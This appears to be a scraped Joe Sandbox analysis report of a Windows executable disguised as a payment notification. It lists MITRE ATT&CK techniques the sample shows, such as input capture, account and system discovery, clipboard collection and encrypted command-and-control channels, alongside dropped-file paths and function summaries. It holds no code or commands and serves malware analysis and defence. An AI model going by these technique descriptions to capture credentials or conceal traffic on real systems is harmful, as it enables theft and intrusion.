Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Notification Confirmation 010_01_2025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\intersentimental

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
Payment Notification Confirmation 010_01_2025.exe

Function 009342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 009342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00972BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00932CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0097065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0093344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00932B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00933170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01315FA0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00932C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01315D00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168
fileCOMMON

Function 00933B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 01314BF0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00933923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre